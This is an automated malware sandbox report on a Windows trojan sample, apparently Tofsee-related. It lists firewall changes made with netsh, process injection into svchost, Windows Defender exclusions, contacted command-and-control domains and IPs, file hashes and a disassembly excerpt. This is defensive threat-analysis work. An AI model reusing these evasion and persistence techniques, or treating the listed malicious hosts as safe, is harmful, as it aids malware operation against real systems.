        Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR
        Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname | 0_2_004088B0
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname | 12_2_004088B0
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_030F88B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname | 15_2_030F88B0

        MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures for that technique; cells without a number were not observed)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 3 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 3 Service Execution | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | 14 Windows Service | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 14 Windows Service | 22 Software Packing | NTDS | 15 System Information Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 412 Process Injection | 1 DLL Side-Loading | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Masquerading | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 412 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

        Behavior Graph

        Behavior Graph ID: 1506014 | Sample: 874A7cigvX.exe | Start date: 07/09/2024 | Architecture: WINDOWS | Score: 100

        Contacted domains / IPs: yahoo.com; vanaheim.cn; 6 other IPs or domains
        Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

        Process tree (recovered from the graph):
        • 874A7cigvX.exe (started)
          dropped: C:\Users\user\AppData\Local\...\xvkslbws.exe, PE32
          signatures: Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
          • cmd.exe (started) -> conhost.exe
            dropped: C:\Windows\SysWOW64\...\xvkslbws.exe (copy), PE32
          • netsh.exe (started) -> conhost.exe
          • cmd.exe (started) -> conhost.exe
          • 3 other processes -> conhost.exe, conhost.exe, conhost.exe
        • xvkslbws.exe (started)
          signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; 2 other signatures
          • svchost.exe (started)
            network: mta7.am0.yahoodns.net 67.195.204.74, 25 (YAHOO-3US, United States); microsoft-com.mail.protection.outlook.com 52.101.42.0, 25 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); 3 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit); Deletes itself after installation; Adds extensions / path to Windows Defender exclusion list (Registry)

Source | Detection | Scanner | Label
874A7cigvX.exe | 68% | Virustotal |
874A7cigvX.exe | 68% | ReversingLabs | Win32.Trojan.Convagent
874A7cigvX.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\xvkslbws.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
mxs.mail.ru | 0% | Virustotal |
mta7.am0.yahoodns.net | 1% | Virustotal |
microsoft-com.mail.protection.outlook.com | 0% | Virustotal |
vanaheim.cn | 16% | Virustotal |
google.com | 0% | Virustotal |
yahoo.com | 0% | Virustotal |
mail.ru | 0% | Virustotal |
smtp.google.com | 0% | Virustotal |

Source | Detection | Scanner | Label
vanaheim.cn:443 | 100% | Avira URL Cloud | phishing
jotunheim.name:443 | 100% | Avira URL Cloud | malware
vanaheim.cn:443 | 8% | Virustotal |
jotunheim.name:443 | 13% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mxs.mail.ru | 217.69.139.150 | true | true | | unknown
mta7.am0.yahoodns.net | 67.195.204.74 | true | true | | unknown
microsoft-com.mail.protection.outlook.com | 52.101.42.0 | true | true | | unknown
vanaheim.cn | 77.232.41.29 | true | true | | unknown
smtp.google.com | 64.233.166.26 | true | false | | unknown
google.com | unknown | unknown | true | | unknown
yahoo.com | unknown | unknown | true | | unknown
mail.ru | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
vanaheim.cn:443 | true | 8% Virustotal; Avira URL Cloud: phishing | unknown
jotunheim.name:443 | true | 13% Virustotal; Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
52.101.42.0 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
64.233.166.26 | smtp.google.com | United States | 15169 | GOOGLEUS | false
217.69.139.150 | mxs.mail.ru | Russian Federation | 47764 | MAILRU-ASMailRuRU | true
77.232.41.29 | vanaheim.cn | Russian Federation | 28968 | EUT-ASEUTIPNetworkRU | true
67.195.204.74 | mta7.am0.yahoodns.net | United States | 26101 | YAHOO-3US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1506014
Start date and time: 2024-09-07 15:13:59 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 874A7cigvX.exe (renamed because the original name is a hash value)
Original Sample Name: Trojan.Autorun.ATA_virussign.com_f7ae445081e10267d2cec9b6b0e2d375.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@22/3@9/5
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 66
• Number of non-executed functions: 255
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.112.250.133, 20.76.201.171, 20.70.246.20, 20.236.44.162, 20.231.239.246
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:15:37 | API Interceptor | 13x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
52.101.42.0 | qkkcfptf.exe | malicious | Tofsee
52.101.42.0 | fdnoqmpv.exe | malicious | Tofsee
52.101.42.0 | .exe | malicious | Unknown
52.101.42.0 | Sm4Ty3Em4z.exe | malicious | Tofsee
52.101.42.0 | rRBVVlBwia.exe | malicious | Tofsee
52.101.42.0 | DWoKcG581L.exe | malicious | Tofsee
52.101.42.0 | L7iza9mNDI.exe | malicious | Tofsee
52.101.42.0 | file.exe | malicious | Tofsee
52.101.42.0 | sorteado!!.com.exe | malicious | Unknown
52.101.42.0 | U9dDsItOij.exe | malicious | Tofsee
217.69.139.150 | RSno9EH0K9.exe | malicious | Tofsee
217.69.139.150 | ODy57hA4Su.exe | malicious | Tofsee
217.69.139.150 | Uc84uB877e.exe | malicious | Tofsee
217.69.139.150 | knkduwqg.exe | malicious | Tofsee
217.69.139.150 | foufdsk.exe | malicious | Tofsee
217.69.139.150 | bEsOrli29K.exe | malicious | Tofsee
217.69.139.150 | Eduhazqw4u.exe | malicious | Tofsee
217.69.139.150 | SGn3RtDC8Y.exe | malicious | Tofsee
217.69.139.150 | Sm4Ty3Em4z.exe | malicious | Tofsee
217.69.139.150 | ewdWlNc8TL.exe | malicious | Tofsee
77.232.41.29 | RSno9EH0K9.exe | malicious | Tofsee
77.232.41.29 | ODy57hA4Su.exe | malicious | Tofsee
77.232.41.29 | Uc84uB877e.exe | malicious | Tofsee
77.232.41.29 | qkkcfptf.exe | malicious | Tofsee
77.232.41.29 | vekvtia.exe | malicious | Tofsee
77.232.41.29 | knkduwqg.exe | malicious | Tofsee
77.232.41.29 | foufdsk.exe | malicious | Tofsee
77.232.41.29 | UUJycuNA6D.exe | malicious | Tofsee
77.232.41.29 | bEsOrli29K.exe | malicious | Tofsee
67.195.204.74 | ewdWlNc8TL.exe | malicious | Tofsee
67.195.204.74 | SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exe | malicious | Tofsee
67.195.204.74 | file.exe | malicious | Tofsee
67.195.204.74 | file.msg.scr.exe | malicious | Unknown
67.195.204.74 | file.exe | malicious | Phorpiex, Xmrig
67.195.204.74 | l3Qj8QhTYZ.exe | malicious | Phorpiex
67.195.204.74 | message.elm.exe | malicious | Unknown
67.195.204.74 | message.txt.exe | malicious | Unknown
67.195.204.74 | test.dat.exe | malicious | Unknown
67.195.204.74 | Update-KB2984-x86.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mta7.am0.yahoodns.net | RSno9EH0K9.exe | malicious | Tofsee | 67.195.228.111
mta7.am0.yahoodns.net | Uc84uB877e.exe | malicious | Tofsee | 67.195.228.109
mta7.am0.yahoodns.net | bEsOrli29K.exe | malicious | Tofsee | 67.195.204.77
mta7.am0.yahoodns.net | Eduhazqw4u.exe | malicious | Tofsee | 67.195.228.109
mta7.am0.yahoodns.net | setup.exe | malicious | Tofsee | 98.136.96.76
mta7.am0.yahoodns.net | m4Jp2TLBHJ.exe | malicious | Tofsee | 67.195.204.77
mta7.am0.yahoodns.net | SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exe | malicious | Tofsee | 67.195.204.74
mta7.am0.yahoodns.net | AvDJi40xp_9fyz7RPmKdbxb4.exe | malicious | Tofsee | 67.195.228.94
mta7.am0.yahoodns.net | dIg0MWRViP.exe | malicious | Tofsee | 67.195.228.94
mta7.am0.yahoodns.net | rpzOeQ5QzX.exe | malicious | Tofsee | 98.136.96.91
microsoft-com.mail.protection.outlook.com | RSno9EH0K9.exe | malicious | Tofsee | 52.101.8.49
microsoft-com.mail.protection.outlook.com | ODy57hA4Su.exe | malicious | Tofsee | 52.101.11.0
microsoft-com.mail.protection.outlook.com | Uc84uB877e.exe | malicious | Tofsee | 52.101.8.49
microsoft-com.mail.protection.outlook.com | qkkcfptf.exe | malicious | Tofsee | 52.101.42.0
microsoft-com.mail.protection.outlook.com | vekvtia.exe | malicious | Tofsee | 52.101.8.49
microsoft-com.mail.protection.outlook.com | knkduwqg.exe | malicious | Tofsee | 52.101.11.0
microsoft-com.mail.protection.outlook.com | foufdsk.exe | malicious | Tofsee | 52.101.40.26
microsoft-com.mail.protection.outlook.com | UUJycuNA6D.exe | malicious | Tofsee | 52.101.40.26
microsoft-com.mail.protection.outlook.com | bEsOrli29K.exe | malicious | Tofsee | 52.101.11.0
microsoft-com.mail.protection.outlook.com | Eduhazqw4u.exe | malicious | Tofsee | 52.101.8.49
vanaheim.cn | RSno9EH0K9.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | ODy57hA4Su.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | Uc84uB877e.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | qkkcfptf.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | vekvtia.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | knkduwqg.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | foufdsk.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | UUJycuNA6D.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | bEsOrli29K.exe | malicious | Tofsee | 77.232.41.29
vanaheim.cn | Eduhazqw4u.exe | malicious | Tofsee | 213.226.112.95
mxs.mail.ru | RSno9EH0K9.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | ODy57hA4Su.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | Uc84uB877e.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | qkkcfptf.exe | malicious | Tofsee | 94.100.180.31
mxs.mail.ru | vekvtia.exe | malicious | Tofsee | 94.100.180.31
mxs.mail.ru | knkduwqg.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | foufdsk.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | UUJycuNA6D.exe | malicious | Tofsee | 94.100.180.31
mxs.mail.ru | bEsOrli29K.exe | malicious | Tofsee | 217.69.139.150
mxs.mail.ru | Eduhazqw4u.exe | malicious | Tofsee | 217.69.139.150
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | 9Zu52GuKZE.exe | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | 9Zu52GuKZE.exe | malicious | Unknown | 20.105.232.30
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://www.tiktok.com/////link/v2?aid=1988&lang=enpgrt&scene=bio_url&target=google.com.////amp/s/siscoringenieria.com/pelk/dist | malicious | HTMLPhisher | 13.107.246.45
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://connect.nrpa.org/discussion/deputy-director-need-your-help-with-the-rest#bm5d45b988-9c01-4edc-8280-0e45b7ae3f64 | malicious | Unknown | 52.179.163.43
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://sso--cdn-sub-coinbasepro-auth.webflow.io/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://help-cdn--eb-exten-coinbase.webflow.io/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://learn--sso-cdn---coinbasepro--auth.webflow.io/ | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://quickpay-arabian.com/ | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://ssomtamask-wallet.webflow.io/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://clicker.extremelyorange.com/ | malicious | Unknown | 13.107.246.57
MAILRU-ASMailRuRU | RSno9EH0K9.exe | malicious | Tofsee | 217.69.139.150
MAILRU-ASMailRuRU | ODy57hA4Su.exe | malicious | Tofsee | 217.69.139.150
MAILRU-ASMailRuRU | Uc84uB877e.exe | malicious | Tofsee | 217.69.139.150
MAILRU-ASMailRuRU | qkkcfptf.exe | malicious | Tofsee | 94.100.180.31
MAILRU-ASMailRuRU | vekvtia.exe | malicious | Tofsee | 94.100.180.31
MAILRU-ASMailRuRU | knkduwqg.exe | malicious | Tofsee | 217.69.139.150
MAILRU-ASMailRuRU | foufdsk.exe | malicious | Tofsee | 217.69.139.150
MAILRU-ASMailRuRU | UUJycuNA6D.exe | malicious | Tofsee | 94.100.180.31
MAILRU-ASMailRuRU | tjigfd64.exe | malicious | LummaC Stealer | 5.181.61.0
MAILRU-ASMailRuRU | tjigfd64.exe | malicious | LummaC Stealer | 5.181.61.0
EUT-ASEUTIPNetworkRU | RSno9EH0K9.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | ODy57hA4Su.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | Uc84uB877e.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | qkkcfptf.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | vekvtia.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | knkduwqg.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | foufdsk.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | UUJycuNA6D.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | bEsOrli29K.exe | malicious | Tofsee | 77.232.41.29
EUT-ASEUTIPNetworkRU | Set-up.exe | malicious | Cryptbot | 77.232.42.234
YAHOO-3US | vekvtia.exe | malicious | Tofsee | 67.195.204.79
YAHOO-3US | UUJycuNA6D.exe | malicious | Tofsee | 67.195.204.77
YAHOO-3US | bEsOrli29K.exe | malicious | Tofsee | 67.195.204.77
YAHOO-3US | firmware.armv7l.elf | malicious | Unknown | 74.6.99.126
YAHOO-3US | Sm4Ty3Em4z.exe | malicious | Tofsee | 67.195.204.73
YAHOO-3US | ewdWlNc8TL.exe | malicious | Tofsee | 67.195.204.74
YAHOO-3US | arm7.elf | malicious | Mirai | 98.139.166.43
YAHOO-3US | https://www.ima-india.com/index.php | malicious | Unknown | 74.6.138.67
YAHOO-3US | https://www.ima-india.com/index.php | malicious | Unknown | 74.6.138.67
YAHOO-3US | https://www.ima-india.com/index.php?option=com_content&view=article&id=1092&Itemid=483 | malicious | Unknown | 74.6.138.65
No context

No context
Process: C:\Users\user\Desktop\874A7cigvX.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11205632
Entropy (8bit): 4.427228358082004
Encrypted: false
SSDEEP: 6144:AtRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw+QFa0lw+QFa0lr:AtRdHbfByTU3OTBtP44cMYW
MD5: 702317DA74C3C1D30ED61EA3A7D7DFCD
SHA1: 7D65AF1304C2AA77DF791E21DE687F3302F1170F
SHA-256: 409942DBC4AE0F7F3EE1D2EEF70180AB21CCD2707621500BDA9F4B3D28632FF6
SHA-512: F9A432E5D7168701766262EDFEA02E0BFD37651A3F64731DA822B6FB20FE43F5E3541A7AE5E0C825A9B1D1CE1064F1FE2CBFAD2139A2F4D85796961416739CDD
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process: C:\Windows\SysWOW64\cmd.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11205632
Entropy (8bit): 4.427228358082004
Encrypted: false
SSDEEP: 6144:AtRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw+QFa0lw+QFa0lr:AtRdHbfByTU3OTBtP44cMYW
MD5: 702317DA74C3C1D30ED61EA3A7D7DFCD
SHA1: 7D65AF1304C2AA77DF791E21DE687F3302F1170F
SHA-256: 409942DBC4AE0F7F3EE1D2EEF70180AB21CCD2707621500BDA9F4B3D28632FF6
SHA-512: F9A432E5D7168701766262EDFEA02E0BFD37651A3F64731DA822B6FB20FE43F5E3541A7AE5E0C825A9B1D1CE1064F1FE2CBFAD2139A2F4D85796961416739CDD
Malicious: true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.O-6.!~6.!~6.!~Y..~*.!~Y..~/.!~Y..~D.!~?..~1.!~6. ~..!~Y..~7.!~Y..~7.!~Y..~7.!~Rich6.!~................PE..L......d.............................l............@.............................................................................P.......P...........................................................@N..@............................................text...T........................... ..`.data............|..................@....yey.................t..............@..@.rsrc...P............x..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3773
                                                                                      Entropy (8bit):4.7109073551842435
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                      MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                      SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                      SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                      SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                      Malicious:false
                                                                                      Preview:..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.975423801517119
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 874A7cigvX.exe
File size: 409'088 bytes
MD5: f7ae445081e10267d2cec9b6b0e2d375
SHA1: e12892ea4d092e4b959617c6d00356ee23da0797
SHA256: 569edae4e4c7f5df590c7ee0a96210942e2be22be73beda9bc1528addca234f4
SHA512: 194a260edb0ce0d6c9b74484b55d64e8d593c990ca647acf4c24dd4b58abee0e586485fb06970557d83cc97159933b55a9fa3cc9316f52c28d86552aa039ab04
SSDEEP: 6144:ztRdHbfGeyTf8CJH1ci6aZRVDqQP4n48rMI8gVzuhZIIQFa0lw:ztRdHbfByTU3OTBtP44cMYW
TLSH: E594CF10BA93D875D5720534BC34CAB2273BBDA25834418B37943B7F3EF16916EA6392
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.O-6.!~6.!~6.!~Y..~*.!~Y..~/.!~Y..~D.!~?..~1.!~6. ~..!~Y..~7.!~Y..~7.!~Y..~7.!~Rich6.!~................PE..L......d...........
Icon Hash: cd4d3d2e4e054903
Entrypoint: 0x406ce0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64D7AFB0 [Sat Aug 12 16:13:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 9875b68adf5a82da587f07ad683d1acb
Instruction
call 00007F95E47F3A9Dh
jmp 00007F95E47EF98Eh
sub eax, 000003A4h
je 00007F95E47EFB24h
sub eax, 04h
je 00007F95E47EFB19h
sub eax, 0Dh
je 00007F95E47EFB0Eh
dec eax
je 00007F95E47EFB05h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F95E47F1EA5h
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 10h
or eax, ecx
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov ecx, 00441040h
add esp, 0Ch
lea eax, dword ptr [esi+1Ch]
sub ecx, esi
mov edi, 00000101h
mov dl, byte ptr [ecx+eax]
mov byte ptr [eax], dl
inc eax
dec edi
jne 00007F95E47EFAF9h
lea eax, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [eax+ecx]
mov byte ptr [eax], dl
inc eax
dec esi
jne 00007F95E47EFAF9h
pop edi
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0000051Ch
mov eax, dword ptr [00441E78h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push edi
lea eax, dword ptr [ebp-00000518h]
push eax
push dword ptr [esi+04h]
call dword ptr [00401130h]
mov edi, 00000100h
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [RES] VS2010 build 30319
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3f6c4 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x206f000 | 0xc450 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3f714 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4e40 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1fc | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3f254 | 0x3f400 | 7ab7433d95fe1f96341728162b638f91 | False | 0.8364045516304348 | data | 7.609251717911276 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x41000 | 0x202ce08 | 0x17c00 | 18b35e49e42f21b75c2e03b67ddf0fc8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yey | 0x206e000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x206f000 | 0xc450 | 0xc600 | c7fae4b954f7fac03d8f05855fd32d20 | False | 0.3594341856060606 | data | 4.347217336297205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
